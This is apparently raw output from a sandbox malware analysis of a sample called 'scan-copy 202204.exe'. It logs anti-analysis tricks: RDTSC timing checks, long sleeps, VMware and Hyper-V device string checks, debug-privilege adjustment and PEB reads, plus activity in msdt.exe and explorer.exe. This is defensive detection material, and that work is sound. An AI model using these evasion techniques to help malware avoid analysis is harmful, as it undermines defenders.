            Source: C:\Users\user\Desktop\scan-copy 202204.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\scan-copy 202204.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AB8614 second address: 0000000000AB861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AB89AE second address: 0000000000AB89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\scan-copy 202204.exe TID: 7020Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\scan-copy 202204.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\timeout.exe TID: 4404Thread sleep count: 68 > 30
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004088E0 rdtsc
            Source: C:\Users\user\Desktop\scan-copy 202204.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\scan-copy 202204.exeAPI coverage: 9.0 %
            Source: C:\Windows\SysWOW64\msdt.exeAPI coverage: 9.5 %
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000010.00000000.376881559.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000010.00000000.368666508.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
            Source: explorer.exe, 00000010.00000000.359538036.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000010.00000000.386457348.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000010.00000000.359538036.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000010.00000000.373892210.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000010.00000000.359538036.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
            Source: explorer.exe, 00000010.00000000.370878585.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
            Source: explorer.exe, 00000010.00000000.377156311.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000010.00000000.359538036.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
            Source: explorer.exe, 00000010.00000000.376881559.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: scan-copy 202204.exe, 00000000.00000002.349334643.000000000152F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000010.00000000.359538036.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004088E0 rdtsc
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01344120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013561A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013561A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013B41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01340050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01340050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013520A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013690AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013258EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013BB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01353B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01353B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013E138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01331B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01331B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013DD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013503E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01364A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01364A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01325210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01325210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01325210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01325210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01343A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01338A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013DB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013DB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013B4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01329240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013252A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013252A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013252A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013252A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013252A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0132AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01333D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013AA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01354D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0134C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01347D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01363D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01351DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01351DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01351DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013F05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013535A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0135FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01352581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01322D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01322D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01322D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01322D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01322D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013D8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0133D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013EFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013A6DC9 mov eax, dword ptr fs:[00000030h]
